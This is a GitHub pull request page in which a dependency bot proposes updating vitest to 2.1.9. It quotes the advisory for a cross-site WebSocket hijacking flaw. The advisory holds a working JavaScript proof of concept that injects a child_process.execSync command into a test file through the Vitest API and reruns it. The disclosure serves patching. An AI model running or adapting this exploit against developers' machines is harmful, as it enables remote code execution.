Skip to content

chore(deps): update dependency vitest to v2.1.9 [security] - autoclosed#26

Closed
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-vitest-vulnerability
Closed

chore(deps): update dependency vitest to v2.1.9 [security] - autoclosed#26
renovate[bot] wants to merge 1 commit intomainfrom
renovate/npm-vitest-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Feb 4, 2025

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vitest (source) 2.1.8 -> 2.1.9 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

vitest-dev/vitest (vitest)

v2.1.9

Compare Source

   🚨 Breaking Changes
   🚀 Features
   🐞 Bug Fixes

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from cdd2d7a to c055288 Compare February 9, 2025 12:43
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from fca46d0 to e5b51c3 Compare March 3, 2025 15:43
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from e1035d8 to 2341c2b Compare March 17, 2025 17:24
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 2341c2b to 6de0f11 Compare April 1, 2025 11:51
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 6de0f11 to ddf33ed Compare April 8, 2025 13:37
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from ddf33ed to 35837bd Compare April 24, 2025 06:29
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 35837bd to ad57169 Compare May 19, 2025 18:07
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from ad57169 to b9a9aef Compare May 28, 2025 09:35
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from b9a9aef to ec7eecb Compare June 6, 2025 04:19
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 3 times, most recently from 2f8bcff to 73d4435 Compare June 22, 2025 12:57
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 73d4435 to 935e608 Compare June 24, 2025 05:27
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 935e608 to 4fda76a Compare July 2, 2025 17:14
@chenjiahan chenjiahan closed this Jul 7, 2025
@renovate renovate bot changed the title chore(deps): update dependency vitest to v2.1.9 [security] chore(deps): update dependency vitest to v2.1.9 [security] - autoclosed Jul 7, 2025
@renovate renovate bot deleted the renovate/npm-vitest-vulnerability branch July 7, 2025 11:13
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@chenjiahan